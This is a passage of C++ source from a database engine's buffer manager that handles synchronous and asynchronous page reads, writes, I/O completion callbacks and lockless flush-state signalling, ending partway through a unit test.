( err == errBFIPageFlushPendingHungIO ) );
return err;
}
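// prepares the given BF for a read by declaring a page fault pending (errBFIPageFaultPending)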
void BFIPrepareReadPage( PBF pbf )
{
// declare I/O pending
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
ERR errT = ErrERRCheck( errBFIPageFaultPending );
pbf->err = SHORT( errT );
Assert( pbf->err == errT );
// hook for (upper layer) station ID
// a better place might be begin transaction, but it is called too frequently to risk its
// performance. if BF had a callout to ISAM / IO to fulfill a page, then this would be the
// perfect place for that.
g_rgfmp[ pbf->ifmp ].TraceStationId( tsidrPulseInfo );
}
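// prepares the given BF for a write by declaring a flush pending (wrnBFPageFlushPending)
// and verifying that it is the oldest version of the page reachable from the hash table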
void BFIPrepareWritePage( PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// we must have never gotten this far with an abandoned buffer.
EnforceSz( !pbf->fAbandoned, "PrepWriteAbandonedBf" );
// declare I/O pending
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
ERR errT = ErrERRCheck( wrnBFPageFlushPending );
pbf->err = SHORT( errT );
Assert( pbf->err == errT );
Enforce( CmpLgpos( pbf->lgposModify, g_rgfmp[ pbf->ifmp ].LgposWaypoint() ) <= 0 ); // just for insurance
Enforce( pbf->icbBuffer == pbf->icbPage );
IFMPPGNO ifmppgno = IFMPPGNO( pbf->ifmp, pbf->pgno );
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
PBF pbfT = pbfNil;
// we had better be writing the oldest version of this page and this page
// had better be reachable from the hash table or cache coherency problems
// can occur (e.g. writing version 3 of a page before version 2)
g_bfhash.ReadLockKey( ifmppgno, &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
Enforce( errHash == BFHash::ERR::errSuccess );
for ( pbfT = pgnopbf.pbf; pbfT != pbfNil && pbfT != pbf; pbfT = pbfT->pbfTimeDepChainNext );
Enforce( pbfT == pbf );
Enforce( pbf->pbfTimeDepChainNext == pbfNil );
g_bfhash.ReadUnlockKey( &lock );
}
// this function performs a Sync Read into the specified Write Latched BF
void BFISyncRead( PBF pbf, const OSFILEQOS qosIoPriorities, const TraceContext& tc )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// prepare sync read
BFIPrepareReadPage( pbf );
pbf->fLazyIO = fFalse;
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const QWORD ibOffset = OffsetOfPgno( pbf->pgno );
const DWORD cbData = CbBFIPageSize( pbf );
BYTE* const pbData = (BYTE*)pbf->pv;
ERR err = JET_errSuccess;
const OSFILEQOS qosIoUserDispatch = QosBFIMergeInstUserDispPri( PinstFromIfmp( pbf->ifmp ), (BFTEMPOSFILEQOS)qosIoPriorities );
// This goes off because we don't pass bflfNew when appropriate on recovery, and recovery
// has to on-demand extend. Be nice to fix this ...
//Expected( pbf->bfat != bfatPageAlloc );
// if we are not mapping views then read the data into the buffer. if we
// are mapping views then we will do this on page verification
// We could optionally for bfatViewMapped BFs check FOSMemoryResident() and do the IO a little
// earlier. Not a material win though at this point (either perf or code simplification)
if ( !FBFICacheViewCacheDerefIo( pbf ) )
{
HRT hrtStart = HrtHRTCount();
err = pfapi->ErrIORead( tc,
ibOffset,
cbData,
pbData,
qosIoUserDispatch | qosIOSignalSlowSyncIO,
NULL, // Passing a NULL pfnCompletion triggers sync I/O (foreground on this thread).
DWORD_PTR( pbf ),
IFileAPI::PfnIOHandoff( BFISyncReadHandoff ) );
BFITrackCacheMissLatency( pbf, hrtStart, ( tc.iorReason.Iorf() & iorfReclaimPageFromOS ) ? bftcmrReasonPagingFaultDb : bftcmrReasonSyncRead, qosIoPriorities, tc, err );
Ptls()->threadstats.cPageRead++;
}
// complete sync read
BFISyncReadComplete( err, pfapi, err == wrnIOSlow ? qosIOCompleteIoSlow : 0, ibOffset, cbData, pbData, pbf );
}
void BFISyncReadHandoff( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
void* const pvIOContext )
{
Assert( JET_errSuccess == err ); // Yeah!!!
BFISetIOContext( pbf, pvIOContext );
}
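// completes a sync read: resets the I/O context and records either errBFIPageNotVerified
// (read succeeded but the page has not been verified yet) or the I/O error on the BF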
void BFISyncReadComplete( const ERR err,
IFileAPI* const pfapi,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// reset the I/O context, since the operation is officially completed.
if ( AtomicReadPointer( &pbf->pvIOContext ) != NULL )
{
BFIResetIOContext( pbf );
}
else
{
Assert( FBFICacheViewCacheDerefIo( pbf ) );
}
// read was successful
if ( err >= 0 )
{
// declare I/O successful but page unverified
ERR errT = ErrERRCheck( errBFIPageNotVerified );
pbf->err = SHORT( errT );
Assert( pbf->err == errT );
PERFOpt( cBFCacheUnused.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// record the fact the read IO was suspiciously slow
if ( grbitQOS & qosIOCompleteIoSlow )
{
pbf->fSuspiciouslySlowRead = fTrue;
}
}
// read was not successful
else
{
// declare the appropriate I/O error
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // BF no longer caches/keeps BFs in EOF state.
}
pbf->fLazyIO = fFalse;
PERFOpt( cBFPagesReadSync.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
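// pre-reserves an IOREQ for an upcoming preread so that the subsequent async read
// does not have to compete for I/O request resources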
ERR ErrBFIAsyncPreReserveIOREQ( IFMP ifmp, PGNO pgno, OSFILEQOS qos, VOID ** ppioreq )
{
IFileAPI *const pfapi = g_rgfmp[ifmp].Pfapi();
const QWORD ibOffset = OffsetOfPgno( pgno );
const DWORD cbData = g_rgfmp[ifmp].CbPage();
return pfapi->ErrReserveIOREQ( ibOffset, cbData, qos, ppioreq );
}
VOID BFIAsyncReleaseUnusedIOREQ( IFMP ifmp, VOID * pioreq )
{
IFileAPI *const pfapi = g_rgfmp[ifmp].Pfapi();
pfapi->ReleaseUnusedIOREQ( pioreq );
}
// this function performs a Async Read into the specified Write Latched BF
ERR ErrBFIAsyncRead( PBF pbf, OSFILEQOS qos, VOID * pioreq, const TraceContext& tc )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwnWriteLatch() );
// only current user is ErrBFIPrereadPage which always pre-allocs an ioreq
Assert( pioreq );
Assert( tc.iorReason.Iorp() != iorpNone ); // iorp should be set by the caller
// prepare async read
BFIPrepareReadPage( pbf );
pbf->fLazyIO = fFalse; // this may change some day ...
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const QWORD ibOffset = OffsetOfPgno( pbf->pgno );
const DWORD cbData = CbBFIPageSize( pbf );
BYTE* const pbData = (BYTE*)pbf->pv;
// we must be passing qosIODispatchImmediate or qosIODispatchBackground or ErrIORead() can fail ...
Assert( qosIODispatchImmediate == ( qosIODispatchMask & qos ) ||
qosIODispatchBackground == ( qosIODispatchMask & qos ) );
// This will indicate an underlying inefficiency, because it means we're
// prereading either a new page (non-sensical, that can't happen today)
// or a page off the EOF (now that recovery is fixed - thanks SOMEONE, this
// only happens when DbScan blindly pre-reads past the end of the file).
// I (SOMEONE) think this should still go off for downlevel (pre "Create DB
// Logs Final DB Size") ... but it didn't go off when I tested with
// ViewCache on globally, so leaving this in for now. May need to be
// taken out... or if you're ambitious, enhanced.
Expected( pbf->bfat != bfatPageAlloc || tc.iorReason.Iort() == iortDbScan );
const BOOL fMapped = FBFICacheViewCacheDerefIo( pbf );
if ( fMapped )
{
Assert( BoolParam( JET_paramEnableViewCache ) );
g_rgfmp[ pbf->ifmp ].IncrementAsyncIOForViewCache();
}
// Note: We let bfatPageAlloc go through and do the IO, because it
// completes with an EOF when appropriate (for DbScan).
if ( pbf->bfat == bfatViewMapped && FOSMemoryPageResident( pbData, cbData ) )
{
// Pre-success / early out!
// We've mapped a view, and the OS already says the page is here, so we can just
// consider the IO "instantly" completed. IO saved. Good job OS. :-)
Assert( BoolParam( JET_paramEnableViewCache ) );
// the pre-allocated io-req is not needed after all
BFIAsyncReleaseUnusedIOREQ( pbf->ifmp, pioreq );
pioreq = NULL;
OSTraceFMP( pbf->ifmp, JET_tracetagBufferManager, OSFormat( "OS File Cache preread skipped for page=[0x%x:0x%x]", (ULONG)pbf->ifmp, pbf->pgno ) );
// directly fire the I/O completion callbacks for this async read
FullTraceContext ftc;
ftc.DeepCopy( GetCurrUserTraceContext().Utc(), tc );
BFIAsyncReadHandoff( JET_errSuccess, pfapi, ftc, qos, ibOffset, cbData, pbData, pbf, NULL );
BFIAsyncReadComplete( JET_errSuccess, pfapi, ftc, qos, ibOffset, cbData, g_rgbBFTemp, pbf );
Ptls()->cbfAsyncReadIOs++; // should remove this - more accurate, but causes assert.
CallS( err ); // we should be returning a success
goto HandleError;
}
// if we are not mapping views then read the data into the buffer
err = pfapi->ErrIORead( tc,
ibOffset,
cbData,
// On mapped IO, we must not read to the OS MM provided pbData ... but
// we still want to incur the OS to read the data, so it will end up
// in the OS MM and then the pbData will just magically get patched up
// and become valid from the OS MM. Magic. We therefore on mapped IO
// read it to a junk buffer, but keep the BF state associated with the
// operation until it completes.
fMapped ? g_rgbBFTemp : pbData,
qos,
IFileAPI::PfnIOComplete( BFIAsyncReadComplete ),
DWORD_PTR( pbf ),
IFileAPI::PfnIOHandoff( BFIAsyncReadHandoff ),
pioreq );
CallS( err );
Assert( ( qos & qosIOOptimizeCombinable ) || err == JET_errSuccess );
if ( err < JET_errSuccess )
{
if ( fMapped )
{
g_rgfmp[ pbf->ifmp ].DecrementAsyncIOForViewCache();
}
goto HandleError;
}
// track that we've an outstanding async read we must ensure is issued
if ( err >= JET_errSuccess )
{
Ptls()->cbfAsyncReadIOs++;
}
HandleError:
return err;
}
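// handoff callback for async reads: stashes the I/O context (when present) and
// hands ownership of the Write Latch over to the I/O manager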
void BFIAsyncReadHandoff( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
void* const pvIOContext )
{
Assert( JET_errSuccess == err ); // Yeah!!!
if ( pvIOContext != NULL )
{
BFISetIOContext( pbf, pvIOContext );
}
else
{
Assert( FBFICacheViewCacheDerefIo( pbf ) );
}
// Ok, ok, let the IO Manager have this one ...
pbf->sxwl.ReleaseOwnership( bfltWrite );
}
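// completion callback for async reads: reclaims latch ownership, records the read
// result on the BF, updates perf counters, traces the preread, and finally releases
// the Write Latch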
void BFIAsyncReadComplete( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf )
{
pbf->sxwl.ClaimOwnership( bfltWrite );
// reset the I/O context, since the operation is officially completed.
if ( AtomicReadPointer( &pbf->pvIOContext ) != NULL )
{
BFIResetIOContext( pbf );
}
else
{
Assert( FBFICacheViewCacheDerefIo( pbf ) );
}
// paramEnableViewCache based IOs should always be with g_rgbBFTemp, and not for any other case
Assert( !FBFICacheViewCacheDerefIo( pbf ) || pbData == g_rgbBFTemp );
Assert( FBFICacheViewCacheDerefIo( pbf ) || pbData != g_rgbBFTemp );
// read was successful
if ( err >= 0 )
{
// declare I/O successful but page unverified
ERR errT = ErrERRCheck( errBFIPageNotVerified );
pbf->err = SHORT( errT );
Assert( pbf->err == errT );
PERFOpt( cBFCacheUnused.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// record the fact the read IO was suspiciously slow
if ( grbitQOS & qosIOCompleteIoSlow )
{
pbf->fSuspiciouslySlowRead = fTrue;
}
}
// read was not successful
else
{
// declare the appropriate I/O error
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // BF no longer caches/keeps BFs in EOF state.
}
pbf->fLazyIO = fFalse;
PERFOpt( cBFPagesReadAsync.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
if ( grbitQOS & qosIOOptimizeCombinable )
{
PERFOpt( cBFPagesCoalescedRead.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
// trace that we have just preread a page
ETCachePrereadPage(
pbf->ifmp,
pbf->pgno,
tc.utc.context.dwUserID,
tc.utc.context.nOperationID,
tc.utc.context.nOperationType,
tc.utc.context.nClientType,
tc.utc.context.fFlags,
tc.utc.dwCorrelationID,
tc.etc.iorReason.Iorp(),
tc.etc.iorReason.Iors(),
tc.etc.iorReason.Iort(),
tc.etc.iorReason.Ioru(),
tc.etc.iorReason.Iorf(),
tc.etc.nParentObjectClass );
// This means we're doing a view-cache fake
if ( g_rgbBFTemp == pbData )
{
g_rgfmp[ pbf->ifmp ].DecrementAsyncIOForViewCache();
}
// release our Write Latch on this BF
pbf->sxwl.ReleaseWriteLatch();
}
// this function performs a Sync Write from the specified Exclusive Latched BF
ERR ErrBFISyncWrite( PBF pbf, const BFLatchType bfltHave, OSFILEQOS qos, const TraceContext& tc )
{
Assert( FBFIUpdatablePage( pbf ) );
// prepare sync write
BFIPrepareWritePage( pbf );
Assert( !FBFIUpdatablePage( pbf ) );
Assert( qosIODispatchImmediate == ( qos & qosIODispatchMask ) ); // calculate fLazyIO correctly anyway
pbf->fLazyIO = ( qosIODispatchImmediate != ( qos & qosIODispatchMask ) );
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const QWORD ibOffset = OffsetOfPgno( pbf->pgno );
const DWORD cbData = CbBFIPageSize( pbf );
BYTE* const pbData = (BYTE*)pbf->pv;
ERR err = JET_errSuccess;
// issue sync write
err = pfapi->ErrIOWrite( tc,
ibOffset,
cbData,
pbData,
qos,
NULL, // Passing a NULL pfnCompletion triggers sync I/O (foreground on this thread).
DWORD_PTR( pbf ),
IFileAPI::PfnIOHandoff( BFISyncWriteHandoff ) );
// complete sync write
FullTraceContext fullTc;
fullTc.DeepCopy( GetCurrUserTraceContext().Utc(), tc );
BFISyncWriteComplete( err, pfapi, fullTc, qos, ibOffset, cbData, pbData, pbf, bfltHave );
return err;
}
void BFISyncWriteHandoff( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
void* const pvIOContext )
{
Assert( JET_errSuccess == err ); // Yeah!!!
BFISetIOContext( pbf, pvIOContext );
}
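// completes a sync write: resets the I/O context, updates the flush map, releases
// the page's range lock, and either cleans the BF (on success) or records the I/O error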
void BFISyncWriteComplete( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
const BFLatchType bfltHave )
{
// reset the I/O context, since the operation is officially completed.
BFIResetIOContext( pbf );
// trace that we have just written a page
BFITraceWritePage( pbf, tc );
Enforce( CmpLgpos( pbf->lgposModify, g_rgfmp[ pbf->ifmp ].LgposWaypoint() ) <= 0 ); // just for insurance
// Update the flush map with the proper flush state.
if ( FBFIDatabasePage( pbf ) )
{
if ( err >= JET_errSuccess )
{
CPAGE::PageFlushType pgft = CPAGE::pgftUnknown;
DBTIME dbtime = dbtimeNil;
const LONG cbBuffer = g_rgcbPageSize[ pbf->icbBuffer ];
CFlushMap* const pfm = g_rgfmp[ pbf->ifmp ].PFlushMap();
const BOOL fIsPagePatching = ( tc.etc.iorReason.Iorp() == IOREASONPRIMARY( iorpPatchFix ) );
const BOOL fIsFmRecoverable = pfm->FRecoverable();
CPAGE cpage;
const LONG cbPage = g_rgcbPageSize[ pbf->icbPage ];
Assert( cbBuffer == cbPage );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, cbBuffer );
dbtime = cpage.Dbtime();
if ( !FUtilZeroed( (BYTE*)pbf->pv, cbBuffer ) && ( dbtime != dbtimeShrunk ) && ( dbtime != dbtimeRevert ) )
{
pgft = cpage.Pgft();
}
cpage.UnloadPage();
if ( fIsPagePatching && fIsFmRecoverable )
{
(void)pfm->ErrSetPgnoFlushTypeAndWait( pbf->pgno, pgft, dbtime );
}
else
{
pfm->SetPgnoFlushType( pbf->pgno, pgft, dbtime );
}
}
}
// release our reference count on the range lock now that our write has completed
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFSyncCompleteRangeNotLocked" );
g_rgfmp[ pbf->ifmp ].LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
// write was successful
if ( err >= JET_errSuccess )
{
// reset BF to "cleaned" status
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: [%s:%s] written to disk (dbtime: %s)",
__FUNCTION__,
OSFormatUnsigned( pbf->ifmp ),
OSFormatUnsigned( pbf->pgno ),
OSFormatUnsigned( (ULONG_PTR)((DBTIME*)pbf->pv)[ 1 ] ) ) );
// versioned pages will no longer be accessed once flushed so we mark them
// as supercold to get them out of the cache quickly
if ( pbf->fOlderVersion )
{
BFIMarkAsSuperCold( pbf, fFalse );
}
const BOOL fFlushed = pbf->fFlushed;
PERFOptDeclare( TCE tce = pbf->tce );
Assert( pbf->err != errBFIPageNotVerified );
Assert( pbf->err != errBFIPageRemapNotReVerified ); // only exists in pWriteSignalComplete
BFICleanPage( pbf, bfltHave );
pbf->fLazyIO = fFalse;
// update our page write stats
if ( fFlushed )
{
PERFOpt( cBFPagesRepeatedlyWritten.Inc( PinstFromIfmp( pbf->ifmp ), tce ) );
}
pbf->fFlushed = fTrue;
PERFOpt( cBFPagesWritten.Inc( PinstFromIfmp( pbf->ifmp ), tce ) );
}
// write was not successful
else
{
// declare the appropriate I/O error
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // illegal to have EOF lingering in the cache
pbf->fLazyIO = fFalse;
// update our page write stats
if ( pbf->fFlushed )
{
PERFOpt( cBFPagesRepeatedlyWritten.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
pbf->fFlushed = fTrue;
}
PERFOpt( cBFPagesWritten.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
if ( tc.etc.iorReason.Iorp() == iorpBFDatabaseFlush )
{
g_asigBFFlush.Set();
}
// Sync IOs don't get QOS signals back ... so we cannot check for qosIOCompleteWriteGameOn here, but
// we shouldn't have sync iorpBFCheckpointAdv IOs anyway; always signal just in case. If we were getting
// them here, we would have to decide if we are signaling checkpoint adv unnecessarily or too much.
Expected( tc.etc.iorReason.Iorp() != iorpBFCheckpointAdv );
if ( tc.etc.iorReason.Iorp() == iorpBFCheckpointAdv )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[pbf->ifmp], bfcpdmrRequestIOThreshold );
}
}
// this function prepares and schedules a BF for Async Write
ERR ErrBFIAsyncWrite( PBF pbf, OSFILEQOS qos, const TraceContext& tc )
{
Assert( FBFIUpdatablePage( pbf ) );
// prepare async write
BFIPrepareWritePage( pbf );
pbf->fLazyIO = ( qosIODispatchImmediate != ( qos & qosIODispatchMask ) );
Assert( !FBFIUpdatablePage( pbf ) );
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
qos |= ( UlParam( PinstFromIfmp( pbf->ifmp ), JET_paramFlight_NewQueueOptions ) & bitUseMetedQ ) ? qosIODispatchWriteMeted : 0x0;
// issue async write
IFileAPI * const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const ERR err = pfapi->ErrIOWrite( tc,
OffsetOfPgno( pbf->pgno ),
CbBFIPageSize( pbf ),
(BYTE*)pbf->pv,
qos,
IFileAPI::PfnIOComplete( BFIAsyncWriteComplete ),
DWORD_PTR( pbf ),
IFileAPI::PfnIOHandoff( BFIAsyncWriteHandoff ) );
CallSx( err, errDiskTilt );
// deal with disk over quota / tilted
if ( errDiskTilt == err )
{
Assert( SHORT( wrnBFPageFlushPending ) == pbf->err );
Assert( pbf->sxwl.FOwnExclusiveLatch() );
pbf->err = JET_errSuccess;
}
return err;
}
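// handoff callback for async writes: stashes the I/O context, updates the flush perf
// counters by I/O reason, and releases the exclusive latch to the I/O manager
// (wrnBFPageFlushPending acts as a virtual x-latch until the flush is completed)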
void BFIAsyncWriteHandoff( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
void* const pvIOContext )
{
Assert( JET_errSuccess == err ); // Yeah!!!
BFISetIOContext( pbf, pvIOContext );
Enforce( CmpLgpos( pbf->lgposModify, g_rgfmp[ pbf->ifmp ].LgposWaypoint() ) <= 0 ); // just for insurance
// while pbf->err == wrnBFPageFlushPending, we maintain a sort of virtual x-latch, in
// that all consumers in BF of the x-latch know that we can't give out an updatable buffer
// while undergoing IO.
Enforce( wrnBFPageFlushPending == pbf->err );
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
#ifdef EXTRA_LATCHLESS_IO_CHECKS
// We may be able to do this for bfat == bfatPageAlloc as well. Of course make sure it matches in BFIFlushComplete()!
if ( !FBFICacheViewCacheDerefIo( pbf ) &&
(DWORD)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() )
{
OSMemoryPageProtect( pbf->pv, CbBFIBufferSize( pbf ) );
}
#endif
// Update the perf statistics
if( grbitQOS & qosIOOptimizeCombinable )
{
PERFOpt( cBFPagesFlushedOpportunely.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
if ( bfdfClean == pbf->bfdf )
{
PERFOpt( cBFPagesFlushedOpportunelyClean.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
}
else
{
Expected( bfdfClean != pbf->bfdf ); // would not be flushing a clean page if not qosIOOptimizeCombinable
switch( tc.etc.iorReason.Iorp() )
{
case iorpBFAvailPool:
case iorpBFShrink:
if ( pbf->lrukic.FSuperColded() )
{
if ( pbf->fOlderVersion )
{
// the only internal reason for super colding is older versioned pages
PERFOpt( cBFPagesFlushedScavengeSuperColdInternal.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
PERFOpt( cBFPagesFlushedScavengeSuperColdUser.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
}
if ( tc.etc.iorReason.Iorp() == iorpBFAvailPool )
{
// May be interesting to independently track foreground scavenging here
PERFOpt( cBFPagesFlushedAvailPool.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else if ( tc.etc.iorReason.Iorp() == iorpBFShrink )
{
PERFOpt( cBFPagesFlushedCacheShrink.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
break;
case iorpBFCheckpointAdv:
if ( tc.etc.iorReason.Iorf() & iorfForeground )
{
PERFOpt( cBFPagesFlushedCheckpointForeground.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
PERFOpt( cBFPagesFlushedCheckpoint.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
break;
case iorpBFDatabaseFlush:
Expected( !( tc.etc.iorReason.Iorf() & iorfForeground ) ); // today we don't mark ErrBFFlush foreground, even though it usually is technically foreground IO
// not under PERFOpt because OSTrace from cBFPagesFlushedContextFlush is needed.
PERFZeroDisabledAndDiscouraged( cBFPagesFlushedContextFlush.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
break;
case iorpBFFilthyFlush:
Expected( tc.etc.iorReason.Iorf() & iorfForeground ); // filthy flush only happens on foreground
PERFOpt( cBFPagesFlushedFilthyForeground.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
break;
default:
AssertSz( fFalse, "Unknown iorp unknown" );
//AssertSz( fFalse, "Unknown iorp = %d", ior.Iorp() );
}
}
Assert( !FBFIUpdatablePage( pbf ) );
Assert( ErrBFIWriteSignalState( pbf ) == wrnBFPageFlushPending );
Enforce( NULL == pbf->pWriteSignalComplete );
// Ok, ok, let the IO Manager have this one ...
pbf->sxwl.ReleaseExclusiveLatch();
}
// this next set of functions controls the "status" of a page being flushed ... the order of sequences is ...
//
// Thread 1: Flusher Thread 2: IO Thread Thread 3: Any old thread
//
// T1 - Some process like checkpoint maintenance or cache shrink decide to flush a dirty page
// and initiates a ErrBFIFlushPage() which will grab the x-latch and validate the page is in
// fact dirty and also the page is not currently in wrnBFPageFlushPending state, and proceeds
// with setting up a flush pending page and dispatching the IO ...
//
// ErrBFIFlushPage( on dirty page )
// x-latch-acquire
// err = wrnBFPageFlushPending
// x-latch-release
// enqueue IO
//
// T2 - At some point after enqueuing the IO Thread will async dispatch the write IO, this
// is left off the diagram as it is out of the buffer manager's scope.
//
// T3 - The IO is completed from the OS, and the IO manager will call back to the buffer
// manager's callback / BFIAsyncWriteComplete() on the IO Thread. This call back signals that the
// write is completed with a possible error via BFIWriteSignalSetComplete(), leaving it up to
// any other thread to finish completing the flush.
//
// BFIAsyncWriteComplete()
// BFIWriteSignalSetComplete( err )
//
// T4 - Finally some other thread takes an interest in the page (could be a write latch, or
// another flush attempt for checkpoint or even BFPurge) and checks if the write is signaled
// complete, and if so completes the flush operation / BFIFlushComplete().
//
// ErrBFIFlushPage or ErrBFILatchPage or other ...
// x-latch-acquire || w-latch-acquire
// // now safe to check state ...
// if ( pbf->err == wrnBFPageFlushPending &&
// wrnBFPageFlushPending != ErrBFIWriteSignalState( pbf ) )
// BFIFlushComplete()
// BFIWriteSignalReset()
// BFICleanPage( if no error )
//
// T3 and T4 could happen in either order, but it is impossible for T4 to happen first AND end up
// calling BFIFlushComplete() due to the "wrnBFPageFlushPending != ErrBFIWriteSignalState( pbf )"
// check. If T4 goes first, that thread just misses the chance to be the lucky thread to
// complete the flush operation and clean the page (if appropriate).
//
// Also due to the "pbf->err == wrnBFPageFlushPending" check and the x-latch, it is impossible
// for T4 to happen before T1.
//
// The primary logic in T4 is encapsulated in FBFICompleteFlushPage(), which if it returns true
// will guarantee FBFIUpdatablePage().
//
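// The write-completion signal packs the completion ERR into the low 16 bits of
// pbf->pWriteSignalComplete; JET_errSuccess is stored as wrnBFIWriteIOComplete so
// that a non-NULL signal always means the write I/O has completed.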
ERR ErrBFIWriteSignalIError( ULONG_PTR pWriteSignal )
{
Assert( pWriteSignal <= 0xFFFF ); // should be self consistent
SHORT errS = (SHORT)( pWriteSignal & 0xFFFF );
if ( wrnBFIWriteIOComplete == errS ) // works because it is a warning
{
return JET_errSuccess;
}
return errS; // implicit cast restores sign
}
ERR ErrBFIWriteSignalState( const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->err == wrnBFPageFlushPending );
const ULONG_PTR pWriteSignal = pbf->pWriteSignalComplete;
if ( pbf->err == wrnBFPageFlushPending && pWriteSignal )
{
const ERR err = ErrBFIWriteSignalIError( pWriteSignal );
Assert( wrnBFPageFlushPending != err );
Assert( wrnBFIWriteIOComplete != err );
return err;
}
return wrnBFPageFlushPending;
}
void BFIWriteSignalSetComplete( PBF pbf, const ERR err )
{
// can't enable this assert, b/c of the unit test.
// Assert( pbf->sxwl.FNotOwner() );
Assert( pbf->err == wrnBFPageFlushPending );
// Can't signal write complete with wrnBFPageFlushPending, otherwise ErrBFIWriteSignalState()
// would be inconsistent.
Assert( err != wrnBFPageFlushPending );
// We truncate the error down to 16 bits, so that we can assert later that our state is consistent.
ULONG_PTR pSignal;
if ( err == JET_errSuccess )
{
pSignal = 0xFFFF & wrnBFIWriteIOComplete;
}
else
{
pSignal = 0xFFFF & err;
}
const ULONG_PTR pInitial = pbf->pWriteSignalComplete;
Enforce( NULL == pInitial ); // right now we support no other next states in conjunction with this ...
Assert( ErrBFIWriteSignalIError( pSignal ) == err );
const ULONG_PTR pBefore = (ULONG_PTR)AtomicCompareExchangePointer( (void**)&(pbf->pWriteSignalComplete), (void*)pInitial, (void*)pSignal );
// NOTE: we've now lost the "virtual latch" that lockless-IO affords us ...
Enforce( pBefore == pInitial );
}
void BFIWriteSignalReset( const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->err == wrnBFPageFlushPending );
const ULONG_PTR pInitial = pbf->pWriteSignalComplete;
const ULONG_PTR pBefore = (ULONG_PTR)AtomicCompareExchangePointer( (void**)&(pbf->pWriteSignalComplete), (void*)pInitial, NULL );
Enforce( pInitial == pBefore ); // should be no competition right now
}
JETUNITTEST( BF, LocklessWriteCompleteSignaling )
{
BF bfLocal;
PBF pbf = &bfLocal;
pbf->sxwl.ClaimOwnership( bfltWrite );
CHECK( 0 == CmpLgpos( &(bfLocal.lgposOldestBegin0), &lgposMax ) ); // ensuring .ctor was called ...
ERR err;
// .ctor should've gone, and this is the initial state ...
CHECK( JET_errSuccess == pbf->err );
CHECK( 0 == pbf->pWriteSignalComplete );
